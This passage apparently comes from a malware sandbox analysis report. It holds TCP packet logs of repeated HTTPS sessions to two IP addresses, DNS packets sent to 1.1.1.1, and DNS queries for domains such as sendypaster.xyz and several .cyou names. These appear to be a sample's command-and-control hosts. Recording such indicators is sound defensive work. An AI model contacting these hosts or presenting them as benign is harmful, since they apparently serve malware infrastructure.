                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.813791037 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.816138029 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.816159010 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.816427946 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.860025883 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.869714975 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:11.911334991 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592766047 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592789888 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592833996 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592849970 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592871904 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592885971 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592912912 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592932940 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592932940 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.592971087 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.789285898 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.789345026 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.789395094 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.789463043 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.789525032 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.818032026 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.818078041 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.818108082 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.818228006 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.820455074 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.820476055 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.820517063 CET49765443192.168.2.423.55.153.106
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.820524931 CET4434976523.55.153.106192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.052483082 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.052537918 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.052622080 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.053014994 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.053030014 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.333467007 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.333543062 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.335730076 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.335745096 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.336008072 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.337232113 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.337260962 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.337295055 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.989609003 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.989780903 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.989842892 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.990009069 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.990035057 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.990050077 CET49772443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:14.990056992 CET44349772172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:15.029922962 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:15.029962063 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:15.030045033 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:15.030320883 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:15.030340910 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.240766048 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.240837097 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.242233992 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.242247105 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.242579937 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.244323969 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.244417906 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:16.244450092 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048773050 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048820972 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048851013 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048882008 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048909903 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048932076 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048938036 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048969984 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048994064 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.048994064 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.058931112 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.058989048 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.058999062 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.067791939 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.067842960 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.067852974 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.110075951 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.168405056 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.219393969 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.240679979 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244445086 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244474888 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244504929 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244522095 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244577885 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244586945 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244601965 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244647980 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244772911 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244786024 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244810104 CET49777443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.244816065 CET44349777172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.486963034 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487013102 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487092018 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487531900 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:17.487545967 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.700272083 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.700426102 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.702168941 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.702178001 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.702421904 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705090046 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705286026 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705316067 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705384970 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:18.705393076 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.696809053 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.696902037 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.696962118 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.697150946 CET49784443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.697185993 CET44349784172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795064926 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795125961 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795221090 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795620918 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:19.795639992 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.007531881 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.007739067 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.009485006 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.009496927 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.009727955 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.011373997 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.011512041 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.011543989 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687660933 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687752962 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687802076 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.687994003 CET49790443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.688009024 CET44349790172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965187073 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965229034 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965377092 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965850115 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:21.965866089 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.182028055 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.182176113 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.183936119 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.183959007 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.184201956 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.187469006 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.187649965 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.187701941 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.187798977 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:23.187824965 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.446329117 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.446414948 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.446599007 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.446732998 CET49795443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.446783066 CET44349795172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.752310991 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.752343893 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.752424955 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.752748966 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:24.752763033 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.967533112 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.967597008 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.968862057 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.968866110 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.969206095 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.970298052 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.970383883 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:25.970390081 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:26.731838942 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:26.731933117 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:26.731992006 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:26.732156992 CET49801443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:26.732172966 CET44349801172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:27.764811039 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:27.764842987 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:27.764915943 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:27.765505075 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:27.765516043 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:28.977984905 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:28.978080988 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:28.980712891 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:28.980721951 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:28.980990887 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.008923054 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010057926 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010097027 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010195971 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010229111 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010339022 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010370970 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010497093 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010520935 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010656118 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010691881 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010833979 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010864019 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.010870934 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.011023998 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.011045933 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.055330038 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.055540085 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.055588961 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.055603981 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.103341103 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.103502989 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.103535891 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.103564978 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.151324987 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.151442051 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.199362040 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:29.250437975 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.893049955 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.893165112 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.893332958 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.893415928 CET49807443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.893434048 CET44349807172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.945293903 CET49818443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.945348978 CET44349818172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.945453882 CET49818443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.945777893 CET49818443192.168.2.4172.67.157.254
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:31.945826054 CET44349818172.67.157.254192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:32.629371881 CET49818443192.168.2.4172.67.157.254

                                                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:04.741497040 CET6190253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:04.983486891 CET53619021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:04.986202955 CET6060753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:05.254189014 CET53606071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:36.644941092 CET5957153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:37.035268068 CET53595711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:08.627518892 CET5479153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:08.932070017 CET53547911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:08.936219931 CET5857553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.160857916 CET53585751.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.164871931 CET5073053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.413908005 CET53507301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.417371988 CET5200053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.804028034 CET53520001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.807132959 CET5581153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.026997089 CET53558111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.029934883 CET5858053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.279098988 CET53585801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.282677889 CET5042253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.420705080 CET53504221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:12.832012892 CET6108753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:13.051553011 CET53610871.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:04.741497040 CET192.168.2.41.1.1.10xcb77Standard query (0)bellflamre.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:04.986202955 CET192.168.2.41.1.1.10x27e7Standard query (0)sendypaster.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:17:36.644941092 CET192.168.2.41.1.1.10x3be8Standard query (0)steppriflej.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:08.627518892 CET192.168.2.41.1.1.10x46dcStandard query (0)greywe-snotty.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:08.936219931 CET192.168.2.41.1.1.10x14e2Standard query (0)supporse-comment.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.164871931 CET192.168.2.41.1.1.10x27f1Standard query (0)smash-boiling.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.417371988 CET192.168.2.41.1.1.10xbbb7Standard query (0)ripe-blade.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:09.807132959 CET192.168.2.41.1.1.10xb5f7Standard query (0)hosue-billowy.cyouA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 01:18:10.029934883 CET192.168.2.41.1.1.10x335bStandard query (0)pollution-raker.cyouA (IP address)IN (0x0001)false
